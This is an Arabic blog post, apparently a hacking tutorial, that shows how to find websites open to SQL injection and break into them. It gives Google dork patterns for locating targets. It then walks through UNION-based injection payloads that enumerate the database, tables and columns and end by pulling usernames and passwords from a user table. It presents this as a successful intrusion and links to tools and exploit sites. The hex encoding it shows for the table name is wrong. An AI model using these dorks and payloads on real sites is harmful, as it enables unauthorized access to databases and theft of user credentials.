بحث

كيف البحث عن ثغرات SQL

مشاهدات الان

ما ادري من صنه هذا : امر بحث Dork

المهم نعطيكم المفيد البحث عن الملفات للحقنه SQL
Web SQL Dork اكتب هذا بمواقع البحث
قوقل ما عاد ينفع ! نعطيكم مثال هذا موقع الكثير من الخدمات وليس بحث

https://gbhackers.com/latest-google-sql-dorks/
شكل البحث مثال فقط
inurl:product.php?mid=
inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
ونطبق المثل في
الاختراق لسكربت معين مثلا WordPress

http://www.WordPress/product.php?Id=13
بس تجد خطي نفس الصوره كمثال يعني مصاب
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1skrUbTLPgX9Ovw-guyDhZhR55NhKZLmMMuuJmy4n4sBMcquYh1DbgGqjusXkWk_BKjhyphenhyphenCQFP27VFuI3jWuN6tpTWrTuTmsfAKvAUIdkh6w8YwC_KujDWJX-yP6lMKYT-TrB1S-jMV8iW/s1600/field-journal.gif

اوامر نجربها
user()
إظهار المستعمل

http://www.WordPress/product.php?Id=-13 union all select
1,user(),3--
version() إصدار قاعدة البيانات
http://www.WordPress/product.php?Id=-13 union all select 1,version(),3--
database() إسم
قاعدة البيانات

http://www.WordPress/product.php?Id=-13 union all select
1,database(),3--
استخراج أسماء
الجداول tables

الان سنقوم باستخراج مجموع الجداول والبحث عن الأهم و هو غالبا الذي
يحمل الأدمين وبياناته الشخصية :
http://www.WordPress/product.php?Id=-13 union all select
1,group_concat(table_name),3 from information_schema.tables where
table_schema=database()--
استخراج اعمدة
الجدول

بعد أن قمنا بتحديد الجدول يجب أن نقوم بتحويله إلى صيغة Hex فمثلا
poll_user سيصبح 0x706f6c6c5f00000572

http://www.WordPress/product.php?Id=-13 union all select
1,group_concat(column_name),3 from information_schema.columns where
table_name=0x706f6c6c5f00000572 --
استخراج المعلومات

أخيرا نأتي لاستخراج المعلومات وسنقوم بالفصل بين Id و الباسوورد و
user ب 0x3a قيمة : بالهيكس
http://www.WordPress/product.php?Id=-13 union all select
1,concat(user_id,0x3a,username,0x3a,userpass),3 from poll_user--
هنا نقدر نقول لك مبروك الاختراق لان عند الخطئ يطلع لك اليوزر نيم يعني الاسم
واذا الكود تشفر لفك : اعلم انك تقدر الدخول للموقع بكل سهوله
واقرب واسهل برنامج اضافه لـ الثعلب اتبع
https://hkrkoz9.blogspot.com/2020/11/hackbar.html

وهذي مواقع الثغرات
https://cxsecurity.com/dorks/
https://nwpc-ch.org/index.php/fr/exploits

وسلامتكم

إرسال تعليق

0 تعليقات